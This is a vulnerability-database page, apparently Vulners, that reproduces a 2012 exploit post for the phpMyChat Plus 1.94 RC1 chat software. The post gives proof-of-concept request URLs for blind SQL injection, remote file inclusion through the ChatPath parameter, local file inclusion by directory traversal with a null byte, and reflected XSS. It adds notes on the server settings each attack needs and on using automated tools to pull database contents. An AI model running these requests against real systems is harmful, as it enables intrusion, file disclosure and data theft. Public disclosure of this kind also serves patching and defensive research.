Lucene search
K

phpMyChat Plus 1.94 RC1 LFI / XSS / RFI / SQL Injection

🗓️ 04 Oct 2012 00:00:00Reported by L0n3ly-H34rTType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities including Blind SQL Injection, Remote File Inclusion, Local File Inclusion, and XS

Code
`############################################  
### Exploit Title: phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities  
### Date: 04/10/2012   
### Author: L0n3ly-H34rT   
### Contact: [email protected]   
### My Site: http://se3c.blogspot.com/   
### Vendor Link: http://sourceforge.net/projects/phpmychat/  
### Software Link: http://sourceforge.net/projects/phpmychat/files/latest/download  
### Version: 1.94 RC1  
### Tested on: Linux/Windows   
############################################  
  
1- Remote Blind SQL Injection :  
  
# P.O.C :  
  
http://localhost/plus/users_popuph.php?B=1&From=remotelogin.php&L=hebrew&LastCheck=[Blind SQL]  
  
----------------------------------------------------------------------------------------  
  
2- Remote File Inclusion :  
  
# P.O.C :  
  
http://localhost/plus/install/old/install.php?ChatPath=http://127.0.0.1/c.txt?  
  
----------------------------------------------------------------------------------------  
  
3- Local File Inclusion :  
  
- Based on this exploit :  
  
http://www.exploit-db.com/exploits/17213/  
  
# P.O.C :  
  
http://localhost/plus/install/old/install.php?ChatPath=../../../../../../boot.ini%00  
  
http://localhost/plus/install/old/install.php?L=../../../../../../boot.ini%00  
  
---------------------------------------------------------------------------------------  
  
4- XSS :  
  
# P.O.C :  
  
http://localhost/plus/input.php?D=20&From=remotelogin.php&L=serbian_latin&N=10&NT=1&O=1&R=Public Room 1&ST=1&T=1&U=[XSS]&Ver=H  
  
http://localhost/plus/users_popuph.php?B=1&From=remotelogin.php&L=chinese_traditional&LastCheck=[XSS]  
  
  
############################################  
  
# Notes :  
  
1- For Remote Blind SQL Injection ( you can use some automatic blind sql injection to get database informations ).  
  
2- For Remote File Inclusion ( must be allow_url_include=On ).  
  
3- For Local File Inclusion ( must be magic_quotes_gpc = Off )  
  
4- For XSS ( you must have a good brain :p )  
  
# Greetz to my friendz  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation